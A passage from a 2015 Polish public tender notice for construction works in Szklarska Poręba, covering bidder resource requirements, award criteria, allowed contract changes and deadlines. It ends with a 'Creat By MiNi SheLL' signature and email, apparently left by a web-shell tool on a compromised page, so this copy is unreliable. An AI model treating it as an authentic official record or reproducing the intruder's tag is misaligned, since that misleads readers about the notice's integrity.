<p>Jeżeli Wykonawca, wykazując spełnienie warunków , o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:
(a)	pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, wg wzoru stanowiącego załącznik nr 7;
(b)	Informację banku  lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającą  wysokość posiadanych środków finansowych lub zdolność kredytową  tego podmiotu , wystawioną nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert- jeżeli udostępnia zasoby, o których mowa        w punkcie VIII.1.3. a).
(c)	Wykaz robót budowlanych wykonanych (zakończonych) oraz nie wykonanych lub wykonanych nienależycie przez _inny podmiot_, w okresie ostatnich pięciu lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem   ich rodzaju i wartości, daty i miejsca wykonania, z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone,  w tym szczególnie dotyczy to robót budowlanych, o których mowa w zdaniu trzecim  i następnym  w punkcie  VIII. 1.1, wg wzoru stanowiącego Załącznik  nr 4 -  jeżeli udostępnia zasoby, o których mowa w punkcie VIII.1.1.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - termin realizacji-za skrócenie terminu  realizacji o minimum 7 dni (włącznie),tj. do 24.08.2015 r. (włącznie) - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :
1.1   zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na    osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Cz. I IDW,
1.2    zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy lub dalszych podwykonawców ,  
1.3  rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia   okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz z jednoczesnym  związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony przed podpisaniem umowy  kosztorys ofertowy, 
   1.4  wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w  trakcie realizacji prac, których zakres rzeczowy nie wykracza poza zakres opisany                         w Dokumentacji projektowej, nie powodujących zmiany umownej ceny, 
1.5	wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych lub _siły wyższej_uniemożliwiających  wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach. W takim przypadku umowny cykl realizacji zamówienia ulega przerwaniu, a jego ponowne wznowienie nastąpi po ustaniu niesprzyjających warunków atmosferycznych lub _siły wyższej_.  Wystąpienie takiej okoliczności wymaga formy pisemnej, zaakceptowanej przez Zamawiającego.
1.6	konieczności wykonania dodatkowych robót budowlanych i_lub robót zabezpieczających będących wynikiem znaleziska o znaczeniu historycznym lub archeologicznym, powodujących  uzasadnione, dodatkowe koszty. W takim przypadku umowny cykl realizacji zamówienia  ulega przerwaniu, a jego ponowne wznowienie nastąpi po otrzymaniu zgody Wojewódzkiego Konserwatora Zabytków</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szklarskaporeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie ze strony internetowej -w wersji papierowej - w ciągu 5 dni od daty złożenia wniosku z dołączonym dowodem wpłaty 30 zł na konto Zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2015 godzina 10:00, miejsce: siedziba Zamawiającego: 58-580 Szklarska Poręba, ul. M. Buczka 2 lub bezpośrednio w Biurze Obsługi Interesanta - parter (adres jw.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com